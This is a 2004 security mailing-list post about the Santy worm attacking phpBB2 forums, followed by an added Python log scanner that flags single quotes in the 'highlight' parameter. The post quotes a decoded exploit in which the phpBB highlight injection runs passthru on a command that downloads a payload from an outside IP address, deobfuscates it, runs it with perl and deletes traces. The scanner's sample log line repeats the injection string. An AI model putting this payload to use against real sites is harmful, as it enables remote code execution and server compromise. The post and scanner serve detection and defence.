Message-ID: <Pine.LNX.4.44.0412232336230.27973-100000@bugsbunny.castlecops.com>
From: zx at castlecops.com (Paul Laudanski)
Subject: RE: Worm hitting PHPbb2 Forums

On Thu, 23 Dec 2004, Patrick Nolan wrote:

> A bot is not uploaded, not sure where that came from.
> And by now, it is not expected to be spreading at all, thanks to the
> interruption in search requests by Google.

There are a couple of posts going on about this, for instance take this 
article:

http://www.cbronline.com/article_news.asp?guid=366C3494-1446-4A8B-973C-F67044266D35

[quote]
"Santy gets easily corrupted," F-Secure Corp's Mikko Hypponen said. "The 
exploit it uses is only able to transfer around 20 bytes of data at a 
time. So the worm transfers itself from one web site to another in small 
chunks."

"If a chunk gets missing, the worm might still work fine... or it might 
fail," Hypponen told ComputerWire. "More generations there are, more 
likely it is to fail because of this."
[/quote]

Compare that to an exploit that is posted @bugtraq:

http://www.securityfocus.com/archive/1/385208

(decoded)

[quote]
rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe 
y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/
.b| perl; rm -f .b *.pl b0t*; echo _END_
highlight='.passthru($HTTP_GET_VARS[rush]).'
[/quote]

It is making use of the highlight exploit in pre-phpBB 2.0.11.

Even though the 'worm' itself may be hindered, we can certainly expect 
script kiddies to attempt these manually.

http://www.modsecurity.org/blog/archives/000046.html

Now that is catching the single quote in the highlight argument.

-- 
Regards,

Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.
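Added example, not code from the post, from phpBB or from the ModSecurity rule it links to: a small access-log scanner that applies the same check the post credits to ModSecurity, flagging a single quote in the `highlight` argument of viewtopic.php. The Apache combined log format, the `/forum/` path and the sample lines are constructed assumptions; the third sample line carries the query shape quoted in the post.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Apache combined format). Only the third
# line carries the highlight/rush query shape quoted in the post.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Dec/2004:23:36:00 +0000] "GET /forum/viewtopic.php?t=42&highlight=santy HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.5 - - [23/Dec/2004:23:36:01 +0000] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
198.51.100.7 - - [23/Dec/2004:23:36:02 +0000] "GET /forum/viewtopic.php?t=42&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27&rush=echo%20_START_ HTTP/1.0" 200 300 "-" "-"
"""

# Pull the request target out of the quoted request-line field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')


def normalize(value, max_rounds=3):
    """Undo URL encoding until the value stops changing (bounded)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_highlight(target):
    """Return the offending highlight value, or None if the request looks clean.

    A search-term highlighter has no legitimate use for a single quote, which is
    the property the ModSecurity rule mentioned in the post keys on.
    """
    query = urlsplit(target).query
    for value in parse_qs(query, keep_blank_values=True).get("highlight", []):
        value = normalize(value)
        if "'" in value:
            return value
    return None


def scan_log(text):
    """Return (line number, client address, highlight value) for each hit."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        bad = suspicious_highlight(m.group("target"))
        if bad is not None:
            hits.append((lineno, line.split()[0], bad))
    return hits


if __name__ == "__main__":
    for lineno, client, value in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {client} sent highlight={value!r}")
```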

